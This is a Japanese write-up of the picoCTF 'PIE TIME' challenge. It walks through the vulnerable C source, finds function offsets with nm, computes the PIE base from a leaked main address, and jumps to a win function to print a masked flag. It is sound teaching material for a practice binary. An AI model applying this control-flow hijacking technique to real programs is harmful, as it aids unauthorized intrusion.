【picoCTF】PIE TIME - PIEのベースアドレス計算で関数アドレスを特定しRIPを乗っ取る

問題概要

picoCTFの「PIE TIME」という問題の解説記事です。

• カテゴリ: Binary Exploitation
• 難易度: Easy

問題文

解説

ステップ1: picoCTFのサーバーに接続

$ nc rescued-float.picoctf.net xxxxx

※ポート番号は問題文に記載されているものを使用してください。

接続すると、以下のように表示されます。

$ nc rescued-float.picoctf.net 65086
Address of main: 0x5ed0810d333d
Enter the address to jump to, ex => 0x12345:

※ポートの番号やアドレスは環境に異なります。

ステップ2: ソースコードの確認

セグメントフォールト時の処理

void segfault_handler() {
  printf("Segfault Occurred, incorrect address.\n");
  exit(0);
}

この関数は不正なアドレスにジャンプしたときに呼び出されます。 セグメントフォールトが発生するとこの関数が実行され、エラーメッセージを表示してプログラムを終了します。

つまり、

• 間違ったアドレス → 失敗、エラーメッセージ表示
• 正しいアドレス → 関数が実行される

という構造になっていることがわかります。

win関数の挙動

int win() {
  FILE *fptr;
  char c;

  printf("You won!\n");
  // Open file
  fptr = fopen("flag.txt", "r");
  if (fptr == NULL)
  {
      printf("Cannot open file.\n");
      exit(0);
  }

  // Read contents from file
  c = fgetc(fptr);
  while (c != EOF)
  {
      printf ("%c", c);
      c = fgetc(fptr);
  }

  printf("\n");
  fclose(fptr);
}

win関数は、以下の処理を行うようです。

1. "You won!"と表示
2. flag.txtファイルを開く
3. ファイルの内容を1文字ずつ読み取り、表示する
4. ファイルを閉じる

main関数の挙動

int main() {
  signal(SIGSEGV, segfault_handler);
  setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered

  printf("Address of main: %p\n", &main);

  unsigned long val;
  printf("Enter the address to jump to, ex => 0x12345: ");
  scanf("%lx", &val);
  printf("Your input: %lx\n", val);

  void (*foo)(void) = (void (*)())val;
  foo();
}

以下の部分で、main関数のアドレスを表示しています。

printf("Address of main: %p\n", &main);

以下では、ユーザーからジャンプ先アドレス(16進数)を入力として受け取っています。

printf("Enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
printf("Your input: %lx\n", val);

そして以下で、入力されたアドレスにジャンプしています。

void (*foo)(void) = (void (*)())val;
foo();

• 入力された値をポインタにキャスト
• その関数ポインタを実行

ステップ3: win関数のアドレス特定

PIEが有効な場合、各関数のアドレスは次のように決まります。

関数の実行時アドレス = PIEベースアドレス + 関数のオフセット

• PIEベースアドレス : 実行ごとに変化するプログラムの基準アドレス
• 関数のオフセット : 常に一定の値で、バイナリ内での関数の位置を示す

ステップ4: 関数のオフセットを調べる

$ nm vuln | grep main
000000000000133d T main

s$ nm vuln | grep win
00000000000012a7 T win

この結果から、以下のことがわかります。

• main関数のオフセット: 0x133d
• win関数のオフセット: 0x12a7

ステップ5: win関数のアドレス計算

$ nc rescued-float.picoctf.net 65086
Address of main: 0x5ed0810d333d
Enter the address to jump to, ex => 0x12345:

PIEベースアドレス = main関数の実行時アドレス - main関数のオフセット
                   = 0x5ed0810d333d - 0x133d
                   = 0x5ed0810d2000

次に、win関数の実行時アドレスを計算します。

win関数の実行時アドレス = PIEベースアドレス + win関数のオフセット
                        = 0x5ed0810d2000 + 0x12a7
                        = 0x5ed0810d32a7

ステップ6: win関数のアドレスを入力

Enter the address to jump to, ex => 0x12345: 0x5ed0810d32a7
Your input: 5ed0810d32a7
You won!
picoCTF{xxxxx}

※フラグはマスクされています。

これで、win関数が実行され、フラグを取得できました。

使用したコマンドの簡単な解説

nc

nc <ホスト名> <ポート番号>

nm

nm <バイナリファイル名>

まとめ

• PIEが有効なバイナリでは、関数のアドレスが実行ごとに変化することを理解する。
• 関数のオフセットを調べ、PIEベースアドレスを利用して目的の関数のアドレスを計算する。
• リモート接続時に正しいアドレスを入力し、目的の関数を実行する。

閲覧ありがとうございました！